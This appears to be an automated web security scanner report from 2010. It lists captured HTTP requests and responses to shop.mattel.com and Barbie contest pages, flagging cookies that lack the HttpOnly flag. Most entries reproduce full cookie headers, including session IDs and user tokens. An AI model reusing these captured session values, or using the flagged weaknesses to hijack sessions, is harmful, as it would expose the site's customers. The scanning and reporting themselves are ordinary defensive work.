GET /coreg/index.jsp?step=logout HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:15:36 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: https://shop.mattel.com/checkout/index.jsp?process=home P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 305
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /emailSignup/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:16:04 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /giftCertificates/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/wishlist/wishlist.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/coreg/inde ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/controller.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:16:17 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: http://shop.mattel.com/home/index.jsp?sr=1 P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 279
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/home/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/shop/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /storeLocator/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gsic_welcome.asp?SMCID=1983&x=http%3A//www.barbie.com/videogirl/ HTTP/1.1 Host: tracking.searchmarketing.com Proxy-Connection: keep-alive Referer: http://shop.mattel.com/product/index.jsp?productId=4199678 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SM=GUID=3cf273a3%2D1e33%2D4fb3%2Db7d3%2Df656fd5ae794&AID=&LastVisitDate=12%2F15%2F2010+5%3A42%3A12+PM&SMCID=2066
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:09:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND Content-Length: 49 Content-Type: image/GIF Set-Cookie: ASPSESSIONIDSQDAABCA=KMEDNHEBKHLACOOPCOCPKBFK; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /display_page?page=gallery HTTP/1.1 Host: videogirlcontest.barbie.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.2.10.1293083893
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /get_entry?id=38;format=thumb HTTP/1.1 Host: videogirlcontest.barbie.com Proxy-Connection: keep-alive Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Response
HTTP/1.1 302 Moved Temporarily Server: Apache Location: http://akamai.eprizecdn.net/mattel/barbie/live/27880E68-ED1A-11DF-88F2-44242484E103_0000.png Pragma: no-cache Cache-Control: no-cache Expires: Wed, 22 Dec 2010 23:59:37 GMT Content-Length: 0 Content-Type: image/png Date: Wed, 22 Dec 2010 23:59:37 GMT Connection: close Set-Cookie: session=4d1290e9ed7fa8ae; path=/; expires=Thu, 23-Dec-2010 00:29:37 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6035471&rn=1820125381&c7=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c4=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c8=Video%20Girl%20-%20Home%20-%20Barbie.com&c9=http%3A%2F%2Fvideogirlcontest.barbie.com%2Fpublic%2Fmedia%2FBarbieGalleryVote_safe.swf&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.barbie.com/videogirl/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=cb1dc5-204.0.5.41-1286583196
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Thu, 23 Dec 2010 00:01:10 GMT Connection: close Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Sat, 22-Dec-2012 00:01:10 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/pdc?cat=&name=landing&sid=2287&browse_products=4199678 HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://shop.mattel.com/product/index.jsp?productId=4199678 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: opt=1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /category/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /family/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /history/index.jsp?ruvClear=yes HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:15:13 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: http://shop.mattel.com/home/index.jsp P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: rvdata=XR240e1804; expires=Tuesday, 10-Jan-2079 03:29:20 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 269
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/home/index. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /product/wishlist/wishlist.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/coreg/index ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:14:21 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b120c09041d; expires=Tuesday, 10-Jan-2079 03:28:28 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 361
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/shop/index. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
cluid=4039987430558971793; expires=Mon, 23 Dec 2030 00:14:24 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /in.php?site_id=140415&res=1920x1200&lang=en&secure=0&href=%2Fshop%2Findex.jsp%3FcategoryId%3D10811496%26sr%3D1%26origkw%3Dvideo&title=Video%20Collection%20-%20Shop.Mattel.Com&ref=&jsuid=4039987430558971793&mime=js&x=0.3191598958801478 HTTP/1.1 Host: stats.clear-media.com Proxy-Connection: keep-alive Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
